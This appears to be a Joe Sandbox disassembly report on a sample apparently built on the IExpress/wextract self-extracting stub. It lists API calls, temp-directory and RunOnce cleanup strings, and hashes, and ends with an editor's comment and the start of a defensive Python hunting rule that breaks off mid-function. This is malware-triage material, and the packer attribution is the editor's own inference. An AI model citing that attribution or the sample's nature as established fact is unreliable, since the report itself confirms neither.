• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
• String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
• API String ID: 3973824516-675003171
• Opcode ID: 5151b4b690296a413f45ac042e329daac5bcf9e7a260b3d0364b2d4300db6156
• Instruction ID: b93c628ca1ed981c363f092a0adb82af56b44b3d7965c71db5f0ddce12f44606
• Opcode Fuzzy Hash: 5151b4b690296a413f45ac042e329daac5bcf9e7a260b3d0364b2d4300db6156
• Instruction Fuzzy Hash: 4ED17F62A186A2C7EB509F21E4502BAB7B1FF9D741F646039DA4E83694DF3DE805CB10

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
• String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$gam
• API String ID: 3100096412-258196273
• Opcode ID: 8239ea3bc8d4f488818524f145e62419a79644bd439c5a8d4d2d204e9e9bee26
• Instruction ID: 506c442b0a8fa7500b7d42cfffb6578fd6f12f47d286e0dab3bb78b9e29c735b
• Opcode Fuzzy Hash: 8239ea3bc8d4f488818524f145e62419a79644bd439c5a8d4d2d204e9e9bee26
• Instruction Fuzzy Hash: 84814671A0C642C7FB609B65E8007BA26B0BF9D745F74703DD94EC66A1CFBCA545CA00

                                                                                          Control-flow Graph
                                                                                          Control-flow graph of the function at 7ff681c26f14 (rendered graph not preserved; its basic blocks call GetCurrentDirectoryA, SetCurrentDirectoryA, GetDiskFreeSpaceA, MulDiv, GetVolumeInformationA, memset, GetLastError and FormatMessageA)
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                          • API String ID: 1611563598-4151094324
                                                                                          • Opcode ID: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
                                                                                          • Instruction ID: c085b6e05f77373fb8da318a750232fb716d89655802d1b3e38c61acb81a1467
                                                                                          • Opcode Fuzzy Hash: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
                                                                                          • Instruction Fuzzy Hash: 07A14B76A18742C7E7608B60E4806AABBB2FF9D744F646139EA4D83B94DF7CD405CB00

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                          • String ID: *MEMCAB$CABINET
                                                                                          • API String ID: 1305606123-2642027498
                                                                                          • Opcode ID: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
                                                                                          • Instruction ID: 8a14df7d6f02a02af3610b23b25bca95addae932096bce690285d71f4ab03dbf
                                                                                          • Opcode Fuzzy Hash: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
                                                                                          • Instruction Fuzzy Hash: 8D510671A08B92C7EB509B50E8552BA7AB0FF8D745FA4A13DD94E82765DFBCE004CB40

                                                                                          Control-flow Graph
                                                                                          Control-flow graph of the function at 7ff681c23214 (rendered graph not preserved; its basic blocks call GetSystemDirectoryA, LoadLibraryA, GetProcAddress, DecryptFileA, FreeLibrary, GetWindowsDirectoryA and SetCurrentDirectoryA)
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                          • API String ID: 3010855178-3008067379
                                                                                          • Opcode ID: 56ef3f4b7feec16b998466a8266caa081bf801e29d979708740ab20d7bae988f
                                                                                          • Instruction ID: 61683dc366bd91bf5d25a564626e598ff372cf45a099e8379e1a88304adbaef8
                                                                                          • Opcode Fuzzy Hash: 56ef3f4b7feec16b998466a8266caa081bf801e29d979708740ab20d7bae988f
                                                                                          • Instruction Fuzzy Hash: 23710561E0C642C7FB619B24E8412B92AB0BF9D790F70703DD94DC62A1DFBCE985CA15

                                                                                          Control-flow Graph
                                                                                          Control-flow graph of the function at 7ff681c26710 (rendered graph not preserved; its basic blocks call CreateDirectoryA, GetSystemInfo and RemoveDirectoryA)
                                                                                          APIs
                                                                                          • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF681C22E07), ref: 00007FF681C2685B
                                                                                            • Part of subcall function 00007FF681C265A8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF681C22E07), ref: 00007FF681C26643
                                                                                            • Part of subcall function 00007FF681C265A8: GetFileAttributesA.KERNELBASE ref: 00007FF681C26652
                                                                                            • Part of subcall function 00007FF681C265A8: GetTempFileNameA.KERNEL32 ref: 00007FF681C2667F
                                                                                            • Part of subcall function 00007FF681C265A8: DeleteFileA.KERNEL32 ref: 00007FF681C26697
                                                                                            • Part of subcall function 00007FF681C265A8: CreateDirectoryA.KERNEL32 ref: 00007FF681C266A8
                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF681C22E07), ref: 00007FF681C267A8
                                                                                          • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF681C22E07), ref: 00007FF681C268B4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                          • API String ID: 1979080616-1381881128
                                                                                          • Opcode ID: 201d07170fcdefcbc0f83a1d7943c8f01de40c2b2ab8886ba132bb97e87172f4
                                                                                          • Instruction ID: c5dd1edd7e2f070084bda42942881e1f43a0b05995c579095e58383f5db9ddde
                                                                                          • Opcode Fuzzy Hash: 201d07170fcdefcbc0f83a1d7943c8f01de40c2b2ab8886ba132bb97e87172f4
                                                                                          • Instruction Fuzzy Hash: 22514BA1A08692C3FB558B15F8142B967B0BF5DB81FB86039CD4DC2691DFBDE809C360

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                                          • String ID: @$HeapSetInformation$Kernel32.dll
                                                                                          • API String ID: 1302179841-1204263913
                                                                                          • Opcode ID: 2f7390ff0c0d46cb9cdc5e9bd2078a34bdbe19e23de9cb8625d4c9295115e43e
                                                                                          • Instruction ID: 7e8480fb273938d5d9f2d261984605e74008d52bfa940a7acb610d6062ceb693
                                                                                          • Opcode Fuzzy Hash: 2f7390ff0c0d46cb9cdc5e9bd2078a34bdbe19e23de9cb8625d4c9295115e43e
                                                                                          • Instruction Fuzzy Hash: 8B412A71E08652C7FBA49B61E8412B976B0BF9DB81F74A13DDA1DC2295DFBCE444C600

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                          • String ID:
                                                                                          • API String ID: 836429354-0
                                                                                          • Opcode ID: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                                                                                          • Instruction ID: dfa74bab08dbbdacf706f0f2b557673943535e3df38a9c1d09fe781c886ea06e
                                                                                          • Opcode Fuzzy Hash: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                                                                                          • Instruction Fuzzy Hash: E4517C72618B86DAEB518F20D8442F977B1FF4AB94FA4A175DA1D83685DF3CE909C300

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                          • API String ID: 3049360512-2700888539
                                                                                          • Opcode ID: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                                                                                          • Instruction ID: 2f29d7f6a2987d213407aaf4f2421313707a18ee82be84cc6142ee528daf7c85
                                                                                          • Opcode Fuzzy Hash: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                                                                                          • Instruction Fuzzy Hash: 16513871A08A92C7EB518B10E8543B977B0FF9DB46FA46139DA4E836A4CF7CE448C740

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWait
                                                                                          • String ID:
                                                                                          • API String ID: 976364251-3916222277
                                                                                          • Opcode ID: 67f5a8c114559d55dd8cf19d65e8c653d15ae20e01125bbcfa2d4a6a434563c8
                                                                                          • Instruction ID: 923374b68ed5b46bc96bab67bcc4a2cec48c7f686e341a53e5ba24e646b91fec
                                                                                          • Opcode Fuzzy Hash: 67f5a8c114559d55dd8cf19d65e8c653d15ae20e01125bbcfa2d4a6a434563c8
                                                                                          • Instruction Fuzzy Hash: 48515F72A18A82C7F7609B10E454379BBB0FF9D755F246139E94D826A8CFBCD444CB00

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Directory$AttributesCreateDeleteNameRemoveTemp
                                                                                          • String ID: IXP$IXP%03d.TMP
                                                                                          • API String ID: 4001122843-3932986939
                                                                                          • Opcode ID: cd7b86485b10685b83dcd6330150a770b90a6da73959a3ca5b2625007923a5f8
                                                                                          • Instruction ID: 73751bad6154fc8970773c3158d9a9fe882c07f126b6e052c7f62770639ff548
                                                                                          • Opcode Fuzzy Hash: cd7b86485b10685b83dcd6330150a770b90a6da73959a3ca5b2625007923a5f8
                                                                                          • Instruction Fuzzy Hash: 9B316D71708A91C7EB209B11E9502B97AB1FF8EB81F65A139DE4E83795CF3CD405C610

                                                                                          Control-flow Graph
                                                                                          • Basic blocks recovered from the rendered graph (the figure's executed / not-executed colouring is not preserved in text). Each entry gives node number, address range, API or call made in the block, and successor nodes:
                                                                                          • 697: 7ff681c28460-7ff681c284a9, call 7ff681c28bf4, GetStartupInfoW -> 701
                                                                                          • 701: 7ff681c284ab-7ff681c284b6 -> 702, 703
                                                                                          • 702: 7ff681c284b8-7ff681c284bb -> 706, 707
                                                                                          • 703: 7ff681c284c2-7ff681c284cb -> 704, 705
                                                                                          • 704: 7ff681c284e7-7ff681c284ef -> 709, 710
                                                                                          • 705: 7ff681c284cd-7ff681c284d5, _amsg_exit -> 708
                                                                                          • 706: 7ff681c284bd -> 703
                                                                                          • 707: 7ff681c284da-7ff681c284e5, Sleep -> 701
                                                                                          • 708: 7ff681c2855e-7ff681c28567 -> 712, 713
                                                                                          • 709: 7ff681c284f1-7ff681c2850e -> 711
                                                                                          • 710: 7ff681c28554 -> 708
                                                                                          • 711: 7ff681c28512-7ff681c28515 -> 716, 717
                                                                                          • 712: 7ff681c28569-7ff681c2857c, _initterm -> 713
                                                                                          • 713: 7ff681c28586-7ff681c28588 -> 714, 715
                                                                                          • 714: 7ff681c2858a-7ff681c2858c -> 715
                                                                                          • 715: 7ff681c28593-7ff681c2859b -> 718, 719
                                                                                          • 716: 7ff681c28546-7ff681c28548 -> 708, 720
                                                                                          • 717: 7ff681c28517-7ff681c28519 -> 720, 721
                                                                                          • 718: 7ff681c2859d-7ff681c285ab, call 7ff681c28b60 -> 719, 730
                                                                                          • 719: 7ff681c285d1-7ff681c285e0 -> 725
                                                                                          • 720: 7ff681c2854a-7ff681c2854f -> 726
                                                                                          • 721: 7ff681c2851b-7ff681c2851f -> 723, 724
                                                                                          • 723: 7ff681c2853b-7ff681c28544 -> 711
                                                                                          • 724: 7ff681c28521-7ff681c28537 -> 723
                                                                                          • 725: 7ff681c285e4-7ff681c285ea -> 728, 729
                                                                                          • 726: 7ff681c286bb-7ff681c286d0 (no successors; function exit)
                                                                                          • 728: 7ff681c285ec-7ff681c285ee -> 734, 735
                                                                                          • 729: 7ff681c2865d-7ff681c28660 -> 731, 732
                                                                                          • 730: 7ff681c285ad-7ff681c285c7 -> 719
                                                                                          • 731: 7ff681c2866f-7ff681c28677, _ismbblead -> 736, 737
                                                                                          • 732: 7ff681c28662-7ff681c2866b -> 731
                                                                                          • 734: 7ff681c285f0-7ff681c285f2 -> 729, 735
                                                                                          • 735: 7ff681c285f4-7ff681c285f9 -> 738, 739
                                                                                          • 736: 7ff681c28679-7ff681c2867c -> 737
                                                                                          • 737: 7ff681c28681-7ff681c28689 -> 725, 726
                                                                                          • 738: 7ff681c28607-7ff681c2863c, call 7ff681c22d70 -> 742, 743
                                                                                          • 739: 7ff681c285fb-7ff681c28605 -> 735
                                                                                          • 742: 7ff681c28646-7ff681c2864d -> 744, 745
                                                                                          • 743: 7ff681c2863e-7ff681c28640, exit -> 742
                                                                                          • 744: 7ff681c2865b -> 726
                                                                                          • 745: 7ff681c2864f-7ff681c28655, _cexit -> 744
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                          • String ID:
                                                                                          • API String ID: 2995914023-0
                                                                                          • Opcode ID: 452453f8cba86726c033ce9af079bec980333149c11a377a6a6421c59040ebf2
                                                                                          • Instruction ID: 40165836b2c216d72846bb9eeadfcbcc68557bd1860dce2cffafaf7094567c46
                                                                                          • Opcode Fuzzy Hash: 452453f8cba86726c033ce9af079bec980333149c11a377a6a6421c59040ebf2
                                                                                          • Instruction Fuzzy Hash: 7A611571A08646C7FBA09B22E89037A22F0FF4C794F64613DD94DC26A5DF3CE845D644
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25220
                                                                                            • Part of subcall function 00007FF681C251F8: SizeofResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25231
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25257
                                                                                            • Part of subcall function 00007FF681C251F8: LoadResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25268
                                                                                            • Part of subcall function 00007FF681C251F8: LockResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25277
                                                                                            • Part of subcall function 00007FF681C251F8: memcpy_s.MSVCRT ref: 00007FF681C25296
                                                                                            • Part of subcall function 00007FF681C251F8: FreeResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C252A5
                                                                                          • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF681C2324B), ref: 00007FF681C262B9
                                                                                          • LocalFree.KERNEL32 ref: 00007FF681C26332
                                                                                            • Part of subcall function 00007FF681C24F2C: LoadStringA.USER32 ref: 00007FF681C24FBC
                                                                                            • Part of subcall function 00007FF681C24F2C: MessageBoxA.USER32 ref: 00007FF681C24FFC
                                                                                            • Part of subcall function 00007FF681C27958: GetLastError.KERNEL32 ref: 00007FF681C2795C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                          • String ID: $<None>$UPROMPT
                                                                                          • API String ID: 957408736-2569542085
                                                                                          • Opcode ID: bce953315df2136bd9c83a7e38e7c9bcfbdf6b05f60fc9f9bc5cb1955f243e78
                                                                                          • Instruction ID: d35b92d19be5f3300e61f321c0459e4962931b5318b8365f9324c227bf526d01
                                                                                          • Opcode Fuzzy Hash: bce953315df2136bd9c83a7e38e7c9bcfbdf6b05f60fc9f9bc5cb1955f243e78
                                                                                          • Instruction Fuzzy Hash: 12316DB1A08352C7F7609B20E55467A7A70FF9D786F60613DDA4E82690DFBDD004CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile$lstrcmp
                                                                                          • String ID: *MEMCAB
                                                                                          • API String ID: 1301100335-3211172518
                                                                                          • Opcode ID: a2c1f66350d6024a7f804a88bc9b7da19f54bdbcb5e3280bfb267e90ce3ff26c
                                                                                          • Instruction ID: 0e2e8f4b8e51f0a7c8927356e76420b8b8e903718e5b5ee6dece17279f3a09e5
                                                                                          • Opcode Fuzzy Hash: a2c1f66350d6024a7f804a88bc9b7da19f54bdbcb5e3280bfb267e90ce3ff26c
                                                                                          • Instruction Fuzzy Hash: 4661A362A58781C7F7608B14E4843BA7AA1FF5DBA4F646339CA6E427D0CF7CA405C600
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileTime$AttributesDateItemLocalText
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                          • API String ID: 851750970-4151094324
                                                                                          • Opcode ID: caf4f2272670990647462f14bfaf3187ac79d74cb37a0834bbd78866cb2a2d6f
                                                                                          • Instruction ID: 409435ffa0dec570b828188150cc341c74e2e2daa487a3ee025a3e3297b094be
                                                                                          • Opcode Fuzzy Hash: caf4f2272670990647462f14bfaf3187ac79d74cb37a0834bbd78866cb2a2d6f
                                                                                          • Instruction Fuzzy Hash: A6515932A18A46D3EB609B21D4001FA67B0FF8CB65F64623ADA5F936D4DE3CE545CB40
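The function record above ends with the concrete working directory this run used, C:\Users\user\AppData\Local\Temp\IXP000.TMP\, and the earlier record with the strings IXP and IXP%03d.TMP is the routine that builds that name under the user's Temp folder. That combination (IXP%03d.TMP, *MEMCAB, UPROMPT) is what Microsoft's IExpress/wextract self-extracting stub uses; the report does not name the packer, so that attribution is the editor's reading. The Python below is an added example, not part of the Joe Sandbox report, that turns the recovered format string into a hunting rule and runs it over constructed file-create and process-create events. The event format, the PIDs and the dropped-file name are invented for the example.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Directory-name format string recovered from the stub in this report: "IXP%03d.TMP".
# printf's %03d is exactly three zero-padded digits, so the candidates are
# Temp\IXP000.TMP, Temp\IXP001.TMP, ... (this run used IXP000.TMP).
IXP_DIR_RE = re.compile(r"\\Temp\\(IXP\d{3}\.TMP)(?:\\|$)", re.IGNORECASE)


def expand_ixp_name(counter: int) -> str:
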